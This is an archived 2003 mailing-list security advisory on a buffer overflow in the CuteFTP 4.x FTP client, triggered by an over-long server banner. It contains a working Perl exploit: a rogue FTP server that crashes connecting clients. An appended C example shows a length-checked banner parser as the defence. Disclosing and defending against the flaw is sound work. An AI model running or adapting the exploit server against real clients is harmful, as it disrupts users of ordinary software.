[VulnWatch] CuteFTP: buffer overflow

From: D4rkGr3y (grey_1999@mail.ru)
Date: 01/04/03

    Date: Sat, 4 Jan 2003 05:01:26 -0800
    From: D4rkGr3y <grey_1999@mail.ru>
    To: bugtraq@securityfocus.com, submissions@packetstormsecurity.com, vulnwatch@vulnwatch.org
    
    

    #####################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    #####################################################*
    #Product: CuteFTP client
    #Authors: GlobalSCAPE Inc. [www.globalscape.com]
    #Vulnerable versions: v.4.*
    #Vulnerability: buffer overflow
    #####################################################*

    #Overview#--------------------------------------------------------------#
    "CuteFTP is a Windows based File Transfer Protocol (FTP) client that
    allows users to utilize the capabilities of FTP without having to
    know all the details of the protocol itself. CuteFTP simplifies FTP
    by offering a user-friendly Windows interface instead of a cumbersome
    command line utility. CuteFTP gives novice PC users the ability to
    upload, download and edit files on remote FTP servers around the world."

    #Problem#---------------------------------------------------------------#
    It's possible to crash CuteFTP (and run shellcode(?)) by sending
    it a long (>2048b) FTP banner. As you understand, this problem could
    be used by an FTP server.

    #Fix#--------------------------------------------------------------------#
    Download the new version from www.globalscape.com.

    #Exploit#----------------------------------------------------------------#

    #!/usr/bin/perl
    ######################################################
    #Here is an example FTP server. It will freeze each
    #CuteFTP user that tries to connect to it.
    #######################################################
    use IO::Socket;
    $port = "21";
    $data = "a";
    $num = "2049";
    $buf .= $data x $num;
    $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
    or die "Couldn't create tcp-server.\n";
    while ($client = $server->accept()) {
     print "Client connected.\n";
     print "Attacking...";
     print $client "$buf";
     print "OK\n";
     close($client);
    }
    #EOF

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981
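
A defensive counterpart to the advisory, added here as an example; it is not part of the original post and not GlobalSCAPE's code. It is a reply-line reader for an FTP client that bounds the banner at an assumed `REPLY_MAX` of 2048 bytes and rejects an over-long line instead of copying it. The function names, status codes and sample inputs are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 2048 /* assumed client limit; the advisory's banner is 2049 bytes */

enum reply_status { REPLY_OK = 0, REPLY_INCOMPLETE = 1, REPLY_TOO_LONG = 2 };

/* Extract one LF- or CRLF-terminated reply line from raw socket bytes.
 * Writes at most out_cap bytes (including the NUL) and rejects, rather than
 * truncates, a line that does not fit. *consumed is set only on REPLY_OK. */
enum reply_status read_reply_line(const unsigned char *in, size_t in_len,
                                  char *out, size_t out_cap, size_t *consumed)
{
    /* Look no further than out_cap-1 text bytes plus an optional CR and the LF. */
    size_t scan = in_len < out_cap + 1 ? in_len : out_cap + 1;
    const unsigned char *nl = memchr(in, '\n', scan);
    if (nl == NULL) /* no terminator yet: wait for more data or give up */
        return in_len > out_cap ? REPLY_TOO_LONG : REPLY_INCOMPLETE;
    size_t n = (size_t)(nl - in);
    if (n > 0 && in[n - 1] == '\r') n--; /* strip the CR of CRLF */
    if (n >= out_cap)
        return REPLY_TOO_LONG;
    memcpy(out, in, n);
    out[n] = '\0';
    *consumed = (size_t)(nl - in) + 1;
    return REPLY_OK;
}

/* Constructed input: `len` bytes of 'a' with no line terminator, the shape of
 * the banner the advisory describes. Returns the parser's verdict. */
enum reply_status verdict_for_unterminated(size_t len)
{
    static unsigned char wire[4096];
    char line[REPLY_MAX];
    size_t used = 0;
    if (len > sizeof wire) len = sizeof wire;
    memset(wire, 'a', len);
    return read_reply_line(wire, len, line, sizeof line, &used);
}

int main(void)
{
    printf("2048 bytes, no LF -> %d\n", verdict_for_unterminated(2048));
    printf("2049 bytes, no LF -> %d\n", verdict_for_unterminated(2049));
    return 0;
}
```

A caller should close the control connection on `REPLY_TOO_LONG` rather than keep buffering, and treat `REPLY_INCOMPLETE` as "read more from the socket".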


